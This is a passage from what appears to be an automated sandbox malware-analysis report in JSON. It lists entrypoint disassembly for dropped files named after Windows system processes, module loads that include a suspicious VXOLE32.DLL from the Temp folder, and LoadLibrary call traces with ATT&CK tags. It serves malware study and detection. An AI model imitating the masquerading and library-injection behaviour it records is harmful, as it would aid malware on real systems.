bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"D3_08.EXE.67E3CC1F.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"SMSS.EXE\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"LSASS.EXE\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"MrD3_08.scr\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"IEXPLORER.EXE.67E3CD97.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"WINLOGON.EXE\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"D3_08.EXE.67E3CBAD.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" loaded module \"KERNEL32\" at base 765b0000\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c900000\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74c20000\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" loaded module \"ADVAPI32.DLL\" at base 76820000\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" loaded module \"CRYPTBASE.DLL\" at base 75380000\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" loaded module \"DWMAPI.DLL\" at base 73c30000\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" loaded module \"KERNEL32.DLL\" at base 765b0000\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" loaded module \"SHELL32.DLL\" at base 76930000\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" loaded module \"OLE32.DLL\" at base 75b90000\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" loaded module \"COMCTL32.DLL\" at base 74380000\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" loaded module \"OLEAUT32.DLL\" at base 76510000\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 765b0000\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" loaded module \"SETUPAPI.DLL\" at base 75cf0000\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" loaded module \"RPCRT4.DLL\" at base 75a00000\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" loaded module \"CLBCATQ.DLL\" at base 76690000\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74050000\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" loaded module \"NTMARTA.DLL\" at base 748f0000\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" loaded module \"USER32\" at base 76720000\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75330000\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"D3_08.exe\" loaded module \"KERNEL32\" at base 765b0000\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"D3_08.exe\" loaded module \"ADVAPI32.DLL\" at base 76820000\n \"D3_08.exe\" loaded module \"CRYPTBASE.DLL\" at base 75380000\n \"D3_08.exe\" loaded module \"DWMAPI.DLL\" at base 73c30000\n \"D3_08.exe\" loaded module \"KERNEL32.DLL\" at base 765b0000\n \"D3_08.exe\" loaded module \"SHELL32.DLL\" at base 76930000\n \"D3_08.exe\" loaded module \"OLE32.DLL\" at base 75b90000\n \"D3_08.exe\" loaded module \"COMCTL32.DLL\" at base 74380000\n \"D3_08.exe\" loaded module \"OLEAUT32.DLL\" at base 76510000\n \"D3_08.exe\" loaded module \"CLBCATQ.DLL\" at base 76690000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74050000\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 765b0000\n \"D3_08.exe\" loaded module \"SETUPAPI.DLL\" at base 75cf0000\n \"D3_08.exe\" loaded module \"RPCRT4.DLL\" at base 75a00000\n \"D3_08.exe\" loaded module \"NTMARTA.DLL\" at base 748f0000\n \"D3_08.exe\" loaded module \"USER32\" at base 76720000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75330000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"IExplorer.exe\" loaded module \"KERNEL32\" at base 765b0000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"IExplorer.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c900000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73f40000\n \"IExplorer.exe\" loaded module \"OLEAUT32.DLL\" at base 76510000\n \"IExplorer.exe\" loaded module \"SXS.DLL\" at base 75390000\n \"IExplorer.exe\" loaded module \"CRYPTSP.DLL\" at base 74e90000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74c20000\n \"IExplorer.exe\" loaded module \"ADVAPI32.DLL\" at base 76820000\n \"IExplorer.exe\" loaded module \"CRYPTBASE.DLL\" at base 75380000\n \"IExplorer.exe\" loaded module \"DWMAPI.DLL\" at base 73c30000\n \"IExplorer.exe\" loaded module \"KERNEL32.DLL\" at base 765b0000\n \"IExplorer.exe\" loaded module \"SHELL32.DLL\" at base 76930000\n \"IExplorer.exe\" loaded module \"OLE32.DLL\" at base 75b90000\n \"IExplorer.exe\" loaded module \"COMCTL32.DLL\" at base 74380000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 765b0000\n \"IExplorer.exe\" loaded module \"SETUPAPI.DLL\" at base 75cf0000\n \"IExplorer.exe\" loaded module \"RPCRT4.DLL\" at base 75a00000\n \"IExplorer.exe\" loaded module \"CLBCATQ.DLL\" at base 76690000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74050000\n \"IExplorer.exe\" loaded module \"NTMARTA.DLL\" at base 748f0000\n \"IExplorer.exe\" loaded module \"USER32\" at base 76720000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75330000\n \"D3_08.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c900000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73f40000\n \"D3_08.exe\" loaded module \"SXS.DLL\" at base 75390000\n \"D3_08.exe\" loaded module \"CRYPTSP.DLL\" at base 74e90000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74c20000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"KERNEL32\" at base 765b0000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74c20000\n \"WINLOGON.EXE\" loaded module \"ADVAPI32.DLL\" at base 76820000\n \"WINLOGON.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75380000\n \"WINLOGON.EXE\" loaded module \"KERNEL32.DLL\" at base 765b0000\n \"WINLOGON.EXE\" loaded module \"SHELL32.DLL\" at base 76930000\n \"WINLOGON.EXE\" loaded module \"OLE32.DLL\" at base 75b90000\n \"WINLOGON.EXE\" loaded module \"COMCTL32.DLL\" at base 74380000\n \"WINLOGON.EXE\" loaded module \"OLEAUT32.DLL\" at base 76510000\n \"WINLOGON.EXE\" loaded module \"CLBCATQ.DLL\" at base 76690000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 765b0000\n \"WINLOGON.EXE\" loaded module \"SETUPAPI.DLL\" at base 75cf0000\n \"WINLOGON.EXE\" loaded module \"RPCRT4.DLL\" at base 75a00000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74050000\n \"WINLOGON.EXE\" loaded module \"NTMARTA.DLL\" at base 748f0000\n \"WINLOGON.EXE\" loaded module \"USER32\" at base 76720000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75330000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73f40000\n \"CSRSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 76510000\n \"CSRSS.EXE\" loaded module \"SXS.DLL\" at base 75390000\n \"CSRSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 74e90000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74c20000\n \"CSRSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 76820000\n \"CSRSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75380000\n \"CSRSS.EXE\" loaded module \"DWMAPI.DLL\" at base 73c30000\n \"CSRSS.EXE\" loaded module \"KERNEL32.DLL\" at base 765b0000\n \"CSRSS.EXE\" loaded module \"SHELL32.DLL\" at base 76930000\n \"CSRSS.EXE\" loaded module \"OLE32.DLL\" at base 75b90000\n \"CSRSS.EXE\" loaded module \"COMCTL32.DLL\" at base 74380000\n \"CSRSS.EXE\" loaded module \"CLBCATQ.DLL\" at base 76690000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74050000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 765b0000\n \"CSRSS.EXE\" loaded module \"SETUPAPI.DLL\" at base 75cf0000\n \"CSRSS.EXE\" loaded module \"RPCRT4.DLL\" at base 75a00000\n \"CSRSS.EXE\" loaded module \"NTMARTA.DLL\" at base 748f0000\n \"CSRSS.EXE\" loaded module \"USER32\" at base 76720000\n \"CSRSS.EXE\" loaded module \"KERNEL32\" at base 765b0000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75330000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"CRYPTSP.DLL\" at base 74e90000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"SERVICES.EXE\" loaded module \"KERNEL32\" at base 765b0000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c900000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74c20000\n \"SERVICES.EXE\" loaded module \"ADVAPI32.DLL\" at base 76820000\n \"SERVICES.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75380000\n \"SERVICES.EXE\" loaded module \"KERNEL32.DLL\" at base 765b0000\n \"SERVICES.EXE\" loaded module \"SHELL32.DLL\" at base 76930000\n \"SERVICES.EXE\" loaded module \"OLE32.DLL\" at base 75b90000\n \"SERVICES.EXE\" loaded module \"COMCTL32.DLL\" at base 74380000\n \"SERVICES.EXE\" loaded module \"OLEAUT32.DLL\" at base 76510000\n \"SERVICES.EXE\" loaded module \"CLBCATQ.DLL\" at base 76690000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74050000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 765b0000\n \"SERVICES.EXE\" loaded module \"SETUPAPI.DLL\" at base 75cf0000\n \"SERVICES.EXE\" loaded module \"RPCRT4.DLL\" at base 75a00000\n \"SERVICES.EXE\" loaded module \"NTMARTA.DLL\" at base 748f0000\n \"SERVICES.EXE\" loaded module \"USER32\" at base 76720000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75330000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"LSASS.EXE\" loaded module \"KERNEL32\" at base 765b0000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"LSASS.EXE\" loaded module \"OLEAUT32.DLL\" at base 76510000\n \"LSASS.EXE\" loaded module \"SXS.DLL\" at base 75390000\n \"LSASS.EXE\" loaded module \"CRYPTSP.DLL\" at base 74e90000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74c20000\n \"LSASS.EXE\" loaded module \"ADVAPI32.DLL\" at base 76820000\n \"LSASS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75380000\n \"LSASS.EXE\" loaded module \"KERNEL32.DLL\" at base 765b0000\n \"LSASS.EXE\" loaded module \"SHELL32.DLL\" at base 76930000\n \"LSASS.EXE\" loaded module \"OLE32.DLL\" at base 75b90000\n \"LSASS.EXE\" loaded module \"COMCTL32.DLL\" at base 74380000\n \"LSASS.EXE\" loaded module \"CLBCATQ.DLL\" at base 76690000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74050000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 765b0000\n \"LSASS.EXE\" loaded module \"SETUPAPI.DLL\" at base 75cf0000\n \"LSASS.EXE\" loaded module \"RPCRT4.DLL\" at base 75a00000\n \"LSASS.EXE\" loaded module \"NTMARTA.DLL\" at base 748f0000\n \"LSASS.EXE\" loaded module \"USER32\" at base 76720000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75330000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c900000\n \"SERVICES.EXE\" loaded module \"CRYPTSP.DLL\" at base 74e90000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73f40000\n \"WINLOGON.EXE\" loaded module \"SXS.DLL\" at base 75390000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c900000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73f40000\n \"SMSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 76510000\n \"SMSS.EXE\" loaded module \"SXS.DLL\" at base 75390000\n \"SMSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 74e90000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74c20000\n \"SMSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 76820000\n \"SMSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75380000\n \"SMSS.EXE\" loaded module \"DWMAPI.DLL\" at base 73c30000\n \"SMSS.EXE\" loaded module \"KERNEL32.DLL\" at base 765b0000\n \"SMSS.EXE\" loaded module \"SHELL32.DLL\" at base 76930000\n \"SMSS.EXE\" loaded module \"OLE32.DLL\" at base 75b90000\n \"SMSS.EXE\" loaded module \"COMCTL32.DLL\" at base 74380000\n \"SMSS.EXE\" loaded module \"CLBCATQ.DLL\" at base 76690000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 765b0000\n \"SMSS.EXE\" loaded module \"SETUPAPI.DLL\" at base 75cf0000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74050000\n \"SMSS.EXE\" loaded module \"RPCRT4.DLL\" at base 75a00000\n \"SMSS.EXE\" loaded module \"NTMARTA.DLL\" at base 748f0000\n \"SMSS.EXE\" loaded module \"USER32\" at base 76720000\n \"SMSS.EXE\" loaded module \"KERNEL32\" at base 765b0000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75330000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"SMSS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c900000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73f40000\n \"SERVICES.EXE\" loaded module \"SXS.DLL\" at base 75390000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73f40000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 